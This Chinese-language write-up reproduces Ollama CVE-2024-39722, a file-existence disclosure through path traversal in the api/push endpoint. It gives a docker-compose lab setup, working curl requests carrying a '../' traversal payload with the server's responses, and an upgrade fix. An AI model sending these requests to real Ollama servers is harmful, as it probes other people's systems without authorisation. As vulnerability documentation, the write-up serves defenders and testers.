# Ollama 文件存在性泄露漏洞 CVE-2024-39722 ## 漏洞描述 Ollama 0.1.45 及之前的版本中,攻击者可以通过 `api/push` 端点的路径遍历暴露服务器上存在的文件。 当调用 `api/push` 路由并提供一个不存在的路径参数时,服务器会将转义后的 `URI` 直接返回给攻击者,从而泄露目标服务器及执行该请求的用户的文件存在性信息,这一漏洞为攻击者提供了一种探测文件是否存在的手段。 参考链接: - https://github.com/advisories/GHSA-cfxq-8762-vx3v - https://oligosecurity.webflow.io/blog/more-models-more-probllms ## 漏洞影响 ``` Ollama ≤ 0.1.45 Fixed in version 0.1.46 ``` ## 环境搭建 docker-compose.yml ``` services: ollama: image: ollama/ollama:0.1.45 container_name: ollama volumes: - ollama:/root/.ollama ports: - "11434:11434" volumes: ollama: ``` 执行如下命令启动 Ollama 0.1.45 服务,并拉取任意一个模型,模拟真实部署环境,例如 `codegemma:2b` : ``` docker compose up -d docker exec -it ollama ollama run codegemma:2b ``` 环境启动后,访问 `http://your-ip:11434/`,此时 Ollma 0.1.45 已经成功运行。 ![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39722/image-20250305140113735.png) ## 漏洞复现 通过 HTTP 暴露服务器目录结构: ``` curl http://your-ip:11434/api/push -d '{ "name": "../../../test../../../:../../../test../../../", "insecure": true, "stream": true }' ----- {"status":"retrieving manifest"} {"status":"couldn't retrieve manifest"} {"error":"stat /root/.ollama/models/manifests/registry.ollama.ai/library/latest: no such file or directory"} ``` ![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39722/image-20250305140157401.png) 基于服务器目录结构,可探测部署的模型: ``` curl http://your-ip:11434/api/push -d '{ "name": "codegemma:2b", "insecure": true, "stream": true }' ``` ![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39722/image-20250305140451558.png) ## 漏洞修复 - 升级至最新版本 https://github.com/ollama/ollama